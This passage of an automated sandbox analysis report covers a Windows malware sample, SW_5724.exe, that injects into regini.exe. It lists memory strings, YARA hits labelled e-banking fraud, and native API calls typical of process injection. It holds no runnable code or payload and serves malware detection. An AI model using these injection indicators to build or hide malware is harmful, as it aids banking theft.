                Source: regini.exe, 0000000A.00000002.4514767041.00000000028FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: regini.exe, 0000000A.00000002.4514767041.00000000028FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: regini.exe, 0000000A.00000002.4514767041.00000000028FE000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4514767041.000000000292B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: regini.exe, 0000000A.00000002.4514767041.000000000292B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: regini.exe, 0000000A.00000003.2628909662.0000000007619000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
                Source: regini.exe, 0000000A.00000002.4516139537.0000000004A2C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 0000000A.00000002.4518077946.0000000005BF0000.00000004.00000800.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4516139537.000000000489A000.00000004.10000000.00040000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515732704.000000000430C000.00000004.00000001.00040000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515732704.000000000417A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
                Source: regini.exe, 0000000A.00000002.4518251639.00000000076F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                Source: Yara match File source: 6.2.SW_5724.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 6.2.SW_5724.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0000000B.00000002.4517476095.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000002.4514626352.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000A.00000002.4515595244.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.2430161361.0000000007360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000009.00000002.4515540359.0000000003660000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.2341900856.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_0042C903 NtClose, 6_2_0042C903
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92B60 NtClose,LdrInitializeThunk, 6_2_01A92B60
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92DF0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_01A92DF0
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92C70 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_01A92C70
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A935C0 NtCreateMutant,LdrInitializeThunk, 6_2_01A935C0
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A94340 NtSetContextThread, 6_2_01A94340
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A94650 NtSuspendThread, 6_2_01A94650
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92BA0 NtEnumerateValueKey, 6_2_01A92BA0
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92B80 NtQueryInformationFile, 6_2_01A92B80
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92BE0 NtQueryValueKey, 6_2_01A92BE0
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92BF0 NtAllocateVirtualMemory, 6_2_01A92BF0
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92AB0 NtWaitForSingleObject, 6_2_01A92AB0
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92AF0 NtWriteFile, 6_2_01A92AF0
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92AD0 NtReadFile, 6_2_01A92AD0
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92DB0 NtEnumerateKey, 6_2_01A92DB0
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92DD0 NtDelayExecution, 6_2_01A92DD0
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92D30 NtUnmapViewOfSection, 6_2_01A92D30
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92D00 NtSetInformationFile, 6_2_01A92D00
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92D10 NtMapViewOfSection, 6_2_01A92D10
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92CA0 NtQueryInformationToken, 6_2_01A92CA0
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92CF0 NtOpenProcess, 6_2_01A92CF0
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92CC0 NtQueryVirtualMemory, 6_2_01A92CC0
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92C00 NtQueryInformationProcess, 6_2_01A92C00
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92C60 NtCreateKey, 6_2_01A92C60
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92FA0 NtQuerySection, 6_2_01A92FA0
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92FB0 NtResumeThread, 6_2_01A92FB0
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92F90 NtProtectVirtualMemory, 6_2_01A92F90
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92FE0 NtCreateFile, 6_2_01A92FE0
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92F30 NtCreateSection, 6_2_01A92F30
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92F60 NtCreateProcessEx, 6_2_01A92F60
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92EA0 NtAdjustPrivilegesToken, 6_2_01A92EA0
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92E80 NtReadVirtualMemory, 6_2_01A92E80
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92EE0 NtQueueApcThread, 6_2_01A92EE0
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A92E30 NtWriteVirtualMemory, 6_2_01A92E30
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A93090 NtSetValueKey, 6_2_01A93090
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A93010 NtOpenDirectoryObject, 6_2_01A93010
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A939B0 NtGetContextThread, 6_2_01A939B0
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A93D10 NtOpenProcessToken, 6_2_01A93D10
                Source: C:\Users\user\Desktop\SW_5724.exe Code function: 6_2_01A93D70 NtOpenThread, 6_2_01A93D70
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB4340 NtSetContextThread,LdrInitializeThunk, 10_2_02DB4340
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB4650 NtSuspendThread,LdrInitializeThunk, 10_2_02DB4650
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2AD0 NtReadFile,LdrInitializeThunk, 10_2_02DB2AD0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2AF0 NtWriteFile,LdrInitializeThunk, 10_2_02DB2AF0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 10_2_02DB2BF0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2BE0 NtQueryValueKey,LdrInitializeThunk, 10_2_02DB2BE0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2BA0 NtEnumerateValueKey,LdrInitializeThunk, 10_2_02DB2BA0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2B60 NtClose,LdrInitializeThunk, 10_2_02DB2B60
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2EE0 NtQueueApcThread,LdrInitializeThunk, 10_2_02DB2EE0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2E80 NtReadVirtualMemory,LdrInitializeThunk, 10_2_02DB2E80
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2FE0 NtCreateFile,LdrInitializeThunk, 10_2_02DB2FE0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2FB0 NtResumeThread,LdrInitializeThunk, 10_2_02DB2FB0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2F30 NtCreateSection,LdrInitializeThunk, 10_2_02DB2F30
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2CA0 NtQueryInformationToken,LdrInitializeThunk, 10_2_02DB2CA0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2C70 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_02DB2C70
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2C60 NtCreateKey,LdrInitializeThunk, 10_2_02DB2C60
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2DD0 NtDelayExecution,LdrInitializeThunk, 10_2_02DB2DD0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2DF0 NtQuerySystemInformation,LdrInitializeThunk, 10_2_02DB2DF0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2D10 NtMapViewOfSection,LdrInitializeThunk, 10_2_02DB2D10
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2D30 NtUnmapViewOfSection,LdrInitializeThunk, 10_2_02DB2D30
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB35C0 NtCreateMutant,LdrInitializeThunk, 10_2_02DB35C0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB39B0 NtGetContextThread,LdrInitializeThunk, 10_2_02DB39B0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2AB0 NtWaitForSingleObject, 10_2_02DB2AB0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2B80 NtQueryInformationFile, 10_2_02DB2B80
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2EA0 NtAdjustPrivilegesToken, 10_2_02DB2EA0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2E30 NtWriteVirtualMemory, 10_2_02DB2E30
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2F90 NtProtectVirtualMemory, 10_2_02DB2F90
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2FA0 NtQuerySection, 10_2_02DB2FA0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2F60 NtCreateProcessEx, 10_2_02DB2F60
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2CC0 NtQueryVirtualMemory, 10_2_02DB2CC0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2CF0 NtOpenProcess, 10_2_02DB2CF0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2C00 NtQueryInformationProcess, 10_2_02DB2C00
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2DB0 NtEnumerateKey, 10_2_02DB2DB0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB2D00 NtSetInformationFile, 10_2_02DB2D00
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB3090 NtSetValueKey, 10_2_02DB3090
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB3010 NtOpenDirectoryObject, 10_2_02DB3010
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB3D70 NtOpenThread, 10_2_02DB3D70
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_02DB3D10 NtOpenProcessToken, 10_2_02DB3D10
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_004893B0 NtCreateFile, 10_2_004893B0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_00489520 NtReadFile, 10_2_00489520
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_00489620 NtDeleteFile, 10_2_00489620
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_004896D0 NtClose, 10_2_004896D0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 10_2_00489840 NtAllocateVirtualMemory, 10_2_00489840
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B116CC6_2_01B116CC
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AA56306_2_01AA5630
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF59106_2_01AF5910
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A699506_2_01A69950
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7B9506_2_01A7B950
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A638E06_2_01A638E0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACD8006_2_01ACD800
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7FB806_2_01A7FB80
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A9DBF96_2_01A9DBF9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD5BF06_2_01AD5BF0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1FB766_2_01B1FB76
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFDAAC6_2_01AFDAAC
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AA5AA06_2_01AA5AA0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B01AA36_2_01B01AA3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B0DAC66_2_01B0DAC6
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD3A6C6_2_01AD3A6C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B17A466_2_01B17A46
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1FA496_2_01B1FA49
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7FDC06_2_01A7FDC0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B17D736_2_01B17D73
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A63D406_2_01A63D40
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B11D5A6_2_01B11D5A
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1FCF26_2_01B1FCF2
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD9C326_2_01AD9C32
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1FFB16_2_01B1FFB1
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A61F926_2_01A61F92
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A23FD26_2_01A23FD2
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A23FD56_2_01A23FD5
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1FF096_2_01B1FF09
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A69EB06_2_01A69EB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E002C010_2_02E002C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E2027410_2_02E20274
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E403E610_2_02E403E6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D8E3F010_2_02D8E3F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3A35210_2_02E3A352
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E1200010_2_02E12000
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E381CC10_2_02E381CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E341A210_2_02E341A2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E401AA10_2_02E401AA
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E0815810_2_02E08158
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D7010010_2_02D70100
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E1A11810_2_02E1A118
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D9C6E010_2_02D9C6E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D7C7C010_2_02D7C7C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DA475010_2_02DA4750
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D8077010_2_02D80770
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E2E4F610_2_02E2E4F6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3244610_2_02E32446
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E2442010_2_02E24420
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E4059110_2_02E40591
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D8053510_2_02D80535
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D7EA8010_2_02D7EA80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E36BD710_2_02E36BD7
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3AB4010_2_02E3AB40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DAE8F010_2_02DAE8F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D668B810_2_02D668B8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D8A84010_2_02D8A840
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D8284010_2_02D82840
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E4A9A610_2_02E4A9A6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D829A010_2_02D829A0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D9696210_2_02D96962
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3EEDB10_2_02E3EEDB
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D92E9010_2_02D92E90
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3CE9310_2_02E3CE93
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D80E5910_2_02D80E59
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3EE2610_2_02E3EE26
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D72FC810_2_02D72FC8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D8CFE010_2_02D8CFE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DFEFA010_2_02DFEFA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DF4F4010_2_02DF4F40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E22F3010_2_02E22F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DA0F3010_2_02DA0F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DC2F2810_2_02DC2F28
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D70CF210_2_02D70CF2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E20CB510_2_02E20CB5
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D80C0010_2_02D80C00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D7ADE010_2_02D7ADE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D98DBF10_2_02D98DBF
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D8AD0010_2_02D8AD00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E1CD1F10_2_02E1CD1F
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E212ED10_2_02E212ED
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D9B2C010_2_02D9B2C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D852A010_2_02D852A0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DC739A10_2_02DC739A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D6D34C10_2_02D6D34C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3132D10_2_02E3132D
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3F0E010_2_02E3F0E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E370E910_2_02E370E9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D870C010_2_02D870C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E2F0CC10_2_02E2F0CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D8B1B010_2_02D8B1B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E4B16B10_2_02E4B16B
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D6F17210_2_02D6F172
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB516C10_2_02DB516C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E316CC10_2_02E316CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DC563010_2_02DC5630
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3F7B010_2_02E3F7B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D7146010_2_02D71460
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3F43F10_2_02E3F43F
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E495C310_2_02E495C3
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E1D5B010_2_02E1D5B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3757110_2_02E37571
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E2DAC610_2_02E2DAC6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E21AA310_2_02E21AA3
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E1DAAC10_2_02E1DAAC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DC5AA010_2_02DC5AA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E37A4610_2_02E37A46
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3FA4910_2_02E3FA49
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DF3A6C10_2_02DF3A6C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DBDBF910_2_02DBDBF9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DF5BF010_2_02DF5BF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D9FB8010_2_02D9FB80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3FB7610_2_02E3FB76
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D838E010_2_02D838E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DED80010_2_02DED800
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D8995010_2_02D89950
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D9B95010_2_02D9B950
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E1591010_2_02E15910
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D89EB010_2_02D89EB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D43FD510_2_02D43FD5
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D43FD210_2_02D43FD2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D81F9210_2_02D81F92
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3FFB110_2_02E3FFB1
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3FF0910_2_02E3FF09
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3FCF210_2_02E3FCF2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DF9C3210_2_02DF9C32
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D9FDC010_2_02D9FDC0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E37D7310_2_02E37D73
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D83D4010_2_02D83D40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E31D5A10_2_02E31D5A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_00471EA010_2_00471EA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046CD8C10_2_0046CD8C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046CD9010_2_0046CD90
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046AFB010_2_0046AFB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046CFB010_2_0046CFB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046B0F410_2_0046B0F4
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046B10010_2_0046B100
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046137910_2_00461379
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0047555010_2_00475550
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0047374B10_2_0047374B
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0047375010_2_00473750
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0048BD4010_2_0048BD40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02BAE3A810_2_02BAE3A8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02BAE4C510_2_02BAE4C5
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02BACBB810_2_02BACBB8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02BAE85C10_2_02BAE85C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02BAD92810_2_02BAD928
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 02DB5130 appears 58 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 02D6B970 appears 280 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 02DEEA12 appears 86 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 02DC7E54 appears 111 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 02DFF290 appears 105 times
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: String function: 01A4B970 appears 280 times
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: String function: 01A95130 appears 58 times
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: String function: 01ACEA12 appears 86 times
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: String function: 01AA7E54 appears 111 times
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: String function: 01ADF290 appears 105 times
                Source: SW_5724.exe, 00000000.00000002.2102976278.0000000009330000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs SW_5724.exe
                Source: SW_5724.exe, 00000000.00000002.2100862691.0000000007770000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs SW_5724.exe
                Source: SW_5724.exe, 00000000.00000002.2086821839.00000000041D9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs SW_5724.exe
                Source: SW_5724.exe, 00000000.00000002.2082673604.00000000029D9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs SW_5724.exe
                Source: SW_5724.exe, 00000000.00000002.2086821839.0000000004211000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs SW_5724.exe
